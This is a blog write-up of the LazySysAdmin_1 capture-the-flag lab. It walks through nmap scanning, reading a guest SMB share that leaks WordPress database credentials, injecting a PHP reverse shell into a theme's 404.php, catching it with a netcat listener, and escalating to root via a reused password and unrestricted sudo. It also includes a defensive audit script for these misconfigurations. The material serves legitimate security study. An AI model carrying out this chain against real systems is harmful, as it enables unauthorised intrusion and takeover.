LazySysAdmin_1 Target Machine

Information Gathering

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.130
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 08:41 EDT
Nmap scan report for 192.1.1.130
Host is up (0.0028s latency).
Not shown: 65529 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6667/tcp open  irc
MAC Address: 00:0C:29:96:E4:E9 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 13.03 seconds
```

Ports 22, 80, 139, 445, 3306 and 6667 are open.

```
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445,3306,6667 192.1.1.130
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 08:43 EDT
Nmap scan report for 192.1.1.130
Host is up (0.00043s latency).

PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-title: Backnode
|_http-server-header: Apache/2.4.7 (Ubuntu)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open              Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host: 192.1.1.128
|_  error: Closing link: (nmap@192.1.1.128) [Client exited]
MAC Address: 00:0C:29:96:E4:E9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time:
|   date: 2023-07-07T12:43:23
|_  start_date: N/A
|_clock-skew: mean: -3h20m00s, deviation: 5h46m24s, median: 0s
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2023-07-07T22:43:23+10:00
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.13 seconds
```

Summing up: the system is Ubuntu; port 80 serves Silex v2.2.7 on Apache; there is a robots.txt listing the directories /old/, /test/, /TR2/ and /Backnode_files/; the page title is Backnode; ports 139 and 445 run Samba and accept guest access; 3306 runs MySQL; 6667 runs an IRC service, which I'm not familiar with, so I'll look it up later.

```
┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ sudo nmap --script=vuln -p22,80,139,445,3306,6667 192.1.1.130
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-07 09:00 EDT
Nmap scan report for 192.1.1.130
Host is up (0.00031s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-enum:
|   /wordpress/: Blog
|   /test/: Test page
|   /robots.txt: Robots file
|   /info.php: Possible information file
|   /phpmyadmin/: phpMyAdmin
|   /wordpress/wp-login.php: Wordpress login page.
|   /apache/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_  /old/: Potentially interesting directory w/ listing on 'apache/2.4.7 (ubuntu)'
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-sql-injection:
|   Possible sqli for queries:
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DD%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=D%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=M%3BO%3DA%27%20OR%20sqlspider
|     http://192.1.1.130:80/Backnode_files/?C=S%3BO%3DA%27%20OR%20sqlspider
|_    http://192.1.1.130:80/Backnode_files/?C=N%3BO%3DA%27%20OR%20sqlspider
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3306/tcp open  mysql
6667/tcp open  irc
|_irc-unrealircd-backdoor: Server closed connection, possibly due to too many reconnects. Try again with argument irc-unrealircd-backdoor.wait set to 100 (or higher if you get this message again).
| irc-botnet-channels:
|_  ERROR: TIMEOUT
MAC Address: 00:0C:29:96:E4:E9 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_
|_smb-vuln-ms10-054: false

Nmap done: 1 IP address (1 host up) scanned in 328.29 seconds
```

A bit more information: the scan turned up the wordpress, test, info.php, phpmyadmin, wordpress/wp-login.php, apache and old directories and files. Let's start with SMB.

SMB Enumeration

```
┌──(kali㉿kali)-[~]
└─$ sudo smbmap -H 192.1.1.130
[sudo] password for kali:
[+] Guest session   	IP: 192.1.1.130:445	Name: 192.1.1.130
        Disk        Permissions   Comment
        ----        -----------   -------
        print$      NO ACCESS     Printer Drivers
        share$      READ ONLY     Sumshare
        IPC$        NO ACCESS     IPC Service (Web server)
```

That reveals an unusual share, share$. Let's try connecting to it with smbclient.

```
┌──(kali㉿kali)-[~]
└─$ smbclient //192.1.1.130/share$
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 15 07:05:52 2017
  ..                                  D        0  Mon Aug 14 08:34:47 2017
  wordpress                           D        0  Tue Aug 15 07:21:08 2017
  Backnode_files                      D        0  Mon Aug 14 08:08:26 2017
  wp                                  D        0  Tue Aug 15 06:51:23 2017
  deets.txt                           N      139  Mon Aug 14 08:20:05 2017
  robots.txt                          N       92  Mon Aug 14 08:36:14 2017
  todolist.txt                        N       79  Mon Aug 14 08:39:56 2017
  apache                              D        0  Mon Aug 14 08:35:19 2017
  index.html                          N    36072  Sun Aug  6 01:02:15 2017
  info.php                            N       20  Tue Aug 15 06:55:19 2017
  test                                D        0  Mon Aug 14 08:35:10 2017
  old                                 D        0  Mon Aug 14 08:35:13 2017

		3029776 blocks of size 1024. 1456476 blocks available
smb: \>
```

There is a surprising amount in here. Judging from robots.txt, this is the website's document root being shared out. First, download the txt files and read them locally.

```
┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ cat deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345

┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser

┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ cat robots.txt
User-agent: *
Disallow: /old/
Disallow: /test/
Disallow: /TR2/
Disallow: /Backnode_files/
```

This gives one important piece of information, the password 12345. We don't yet know whose password it is, so note it down for now. Continuing through the SMB share and looking into each folder, the file most worth attention is wp-config.php; download it and check whether it contains a database connection password.

```
┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ head -n 30 wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'Admin');

/** MySQL database password */
define('DB_PASSWORD', 'TogieMYSQL12345^^');
```

That gives a username and password pair, Admin:TogieMYSQL12345^^. Recalling that the earlier nmap scan found phpmyadmin, let's try logging in with these credentials.

phpMyAdmin Login

The login succeeded, though it threw a lot of errors, apparently a configuration problem; no big deal. Since the visual interface is broken, I used SQL statements directly. When querying, I first tried to dump the whole table:

```sql
SELECT * FROM wp-users;
```

but that produced an error, so I tried selecting specific fields instead.

Although the passwords are stored as hashes, the WordPress login username is the same as the database username, so it's worth trying the same password to log in.

WordPress Login

The login succeeded.

Reverse Shell

So let's go straight to the theme editor and modify the 404.php file.

There is an Update File button, so I wrote the classic PHP reverse shell into it. Next I needed a URL to trigger it. I originally wanted to be lazy and change a post's link to redirect to 404.php, but the site doesn't seem to be configured for that, so I had to find the real full path of 404.php; wpscan can find the theme path.

```
┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ wpscan --url http://192.1.1.130/wordpress/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.1.1.130/wordpress/ [192.1.1.130]
[+] Started: Fri Jul  7 09:34:11 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.7 (Ubuntu)
 |  - X-Powered-By: PHP/5.5.9-1ubuntu4.22
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.1.1.130/wordpress/xmlrpc.php
 | Found By: Link Tag (Passive Detection)
 | Confidence: 100%
 | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.1.1.130/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Registration is enabled: http://192.1.1.130/wordpress/wp-login.php?action=register
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.1.1.130/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.1.1.130/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
 | Found By: Rss Generator (Passive Detection)
 |  - http://192.1.1.130/wordpress/?feed=rss2, <generator>https://wordpress.org/?v=4.8.1</generator>
 |  - http://192.1.1.130/wordpress/?feed=comments-rss2, <generator>https://wordpress.org/?v=4.8.1</generator>

[+] WordPress theme in use: twentyfifteen
 | Location: http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/
 | Last Updated: 2023-03-29T00:00:00.000Z
 | Readme: http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/readme.txt
 | [!] The version is out of date, the latest version is 3.4
 | Style URL: http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/style.css?ver=4.8.1
 | Style Name: Twenty Fifteen
 | Style URI: https://wordpress.org/themes/twentyfifteen/
 | Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.8 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/style.css?ver=4.8.1, Match: 'Version: 1.8'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=====================================> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jul  7 09:34:16 2023
[+] Requests Done: 170
[+] Cached Requests: 5
[+] Data Sent: 44.699 KB
[+] Data Received: 267.936 KB
[+] Memory used: 262.582 MB
[+] Elapsed time: 00:00:04
```

That gives the theme path, http://192.1.1.130/wordpress/wp-content/themes/twentyfifteen/. With a listener already started on the attacking machine, I opened the 404.php in the browser.

Although the page immediately showed an error, looking back at Kali the reverse shell had already connected. Next, improve the interactive environment and do the most basic foothold checks.

```
┌──(kali㉿kali)-[~/tools/LazySysAdmin_1]
└─$ sudo nc -lvnp 443
[sudo] password for kali:
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.130] 43140
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
 23:30:06 up 51 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@LazySysAdmin:/$ whoami
whoami
www-data
www-data@LazySysAdmin:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@LazySysAdmin:/$ uname -a
uname -a
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux
www-data@LazySysAdmin:/$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
    link/ether 00:0c:29:96:e4:e9 brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.130/24 brd 192.1.1.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::20c:29ff:fe96:e4e9/64 scope link
       valid_lft forever preferred_lft forever
www-data@LazySysAdmin:/$
```
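The foothold above rests on three misconfigurations that are cheap to check before a host ships: a guest-readable Samba share that exports the web root, a wp-config.php holding database credentials inside that share, and the WordPress theme editor left enabled. The audit script below is an added example, not code from the writeup or from Samba/WordPress; the smb.conf and wp-config.php it reads are constructed samples, and the web root and wp-config.php locations are assumptions.

```python
"""Audit smb.conf and wp-config.php for the misconfigurations chained in this walkthrough.
Added example; the sample inputs are constructed, not copied from the target."""
import re
from pathlib import PurePosixPath

# Constructed sample smb.conf (hypothetical): reproduces the observed guest READ ONLY share$.
SMB_CONF = """
[global]
   workgroup = WORKGROUP
[share$]
   comment = Sumshare
   path = /var/www/html
   guest ok = yes
   read only = yes
"""
# Constructed sample wp-config.php; the password is a placeholder, not the real value.
WP_CONFIG = """<?php
define('DB_NAME', 'wordpress');
define('DB_USER', 'Admin');
define('DB_PASSWORD', 'PLACEHOLDER_DB_PASSWORD');
"""
WP_CONFIG_PATH = "/var/www/html/wordpress/wp-config.php"  # assumed location
WEB_ROOT = "/var/www/html"                                 # assumed DocumentRoot

def parse_smb_conf(text):
    """Parse smb.conf-style text into {section: {lowercased key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":          # smb.conf comments start with ; or #
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip().lower()] = value.strip()
    return sections

def wp_defines(text):
    """Collect define('KEY', 'string'|true|false) constants from wp-config.php text."""
    pat = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*(?:'([^']*)'|(true|false))\s*\)")
    return {m[1]: m[2] if m[2] is not None else m[3] for m in pat.finditer(text)}

def is_under(path, root):
    p, r = PurePosixPath(path), PurePosixPath(root)
    return p == r or r in p.parents

def audit(smb_text, wp_text, wp_path=WP_CONFIG_PATH, web_root=WEB_ROOT):
    """Return (finding_id, detail) tuples; an empty list means nothing was flagged."""
    findings, defines = [], wp_defines(wp_text)
    for name, opts in parse_smb_conf(smb_text).items():
        if name == "global" or "path" not in opts:
            continue
        if opts.get("guest ok", opts.get("public", "no")).lower() != "yes":
            continue                               # share requires credentials: fine
        findings.append(("guest-share", f"[{name}] is readable without credentials"))
        if is_under(opts["path"], web_root):
            findings.append(("webroot-shared", f"[{name}] exports {opts['path']}"))
        if is_under(wp_path, opts["path"]) and "DB_PASSWORD" in defines:
            findings.append(("db-creds-exposed", f"{wp_path} is reachable via [{name}]"))
    if defines.get("DISALLOW_FILE_EDIT") != "true":   # theme/plugin editor can write PHP
        findings.append(("theme-editor-enabled", "DISALLOW_FILE_EDIT is not true"))
    return findings
```

Running `audit(SMB_CONF, WP_CONFIG)` on the samples reports all four findings; setting `guest ok = no` on the share and adding `define('DISALLOW_FILE_EDIT', true);` to wp-config.php clears them.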

Switching User

We have already gone through the SMB share for the key information, so now focus on other things, starting with scheduled tasks.

```
www-data@LazySysAdmin:/var/www/html$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
```

Nothing useful there. Let's look at the home directory.

```
www-data@LazySysAdmin:/home$ ls
ls
togie
www-data@LazySysAdmin:/home$ cd togie
cd togie
www-data@LazySysAdmin:/home/togie$ ls
ls
www-data@LazySysAdmin:/home/togie$ ls -liah
ls -liah
total 24K
  720 drwxr-xr-x 3 togie togie 4.0K Aug 15  2017 .
  758 drwxr-xr-x 3 root  root  4.0K Aug 14  2017 ..
34865 -rw-r--r-- 1 togie togie  220 Aug 14  2017 .bash_logout
34871 -rw-r--r-- 1 togie togie 3.6K Aug 14  2017 .bashrc
37880 drwx------ 2 togie togie 4.0K Aug 14  2017 .cache
37872 -rw-r--r-- 1 togie togie  675 Aug 14  2017 .profile
```

There are no valuable hidden files in the user's directory. We still have the password 12345 from earlier, so try switching straight to root with it.

```
www-data@LazySysAdmin:/var/www/html$ su -
su -
Password: 12345

su: Authentication failure
```

That failed, but the username from the home directory is worth trying too.

```
www-data@LazySysAdmin:/home$ su togie
su togie
Password: 12345
```

Privilege Escalation

The switch succeeded. Check whether this user has any sudo rights.

```
togie@LazySysAdmin:/home$ sudo -l
sudo -l
[sudo] password for togie: 12345

Matching Defaults entries for togie on LazySysAdmin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User togie may run the following commands on LazySysAdmin:
    (ALL : ALL) ALL
```

Well, this user can run anything as root, so just spawn a new bash via sudo.

```
togie@LazySysAdmin:/home$ sudo /bin/bash
sudo /bin/bash
root@LazySysAdmin:/home# cd /root
cd /root
root@LazySysAdmin:/root# ls
ls
proof.txt
root@LazySysAdmin:/root# cat proof.txt
cat proof.txt
WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851


Well done :)

Hope you learn't a few things along the way.

Regards,

Togie Mcdogie




Enjoy some random strings

WX6k7NJtA8gfk*w5J3&T@*Ga6!0o5UP89hMVEQ#PT9851
2d2v#X6x9%D6!DDf4xC1ds6YdOEjug3otDmc1$#slTET7
pf%&1nRpaj^68ZeV2St9GkdoDkj48Fl$MI97Zt2nebt02
bhO!5Je65B6Z0bhZhQ3W64wL65wonnQ$@yw%Zhy0U19pu
root@LazySysAdmin:/root#
```

Source: https://i3eg1nner.github.io/2023/07/ce627963c73e.html
Author: I3eg1nner
Published: 7 July 2023